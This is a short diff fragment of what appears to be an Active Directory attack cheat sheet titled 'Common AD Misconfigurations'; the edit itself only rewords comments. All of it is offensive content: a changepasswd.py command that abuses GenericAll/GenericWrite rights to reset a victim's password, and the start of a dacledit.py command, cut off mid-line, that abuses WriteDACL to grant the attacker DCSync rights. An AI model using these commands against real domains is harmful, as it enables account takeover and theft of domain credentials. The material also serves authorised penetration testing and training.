 Common AD Misconfigurations

-# GenericAll / GenericWrite on user → reset their password
+# GenericAll / GenericWrite on a user — reset their password

 python3 changepasswd.py domain.local/attacker:password@10.10.10.1 -newpass 'Hacked123!' -altuser victim

-# WriteDACL on domain → grant DCSync rights
+# WriteDACL on the domain object — grant yourself DCSync rights

 python3 dacledit.py domain.local/user:password -dc-ip 10.10.10.1 -action write \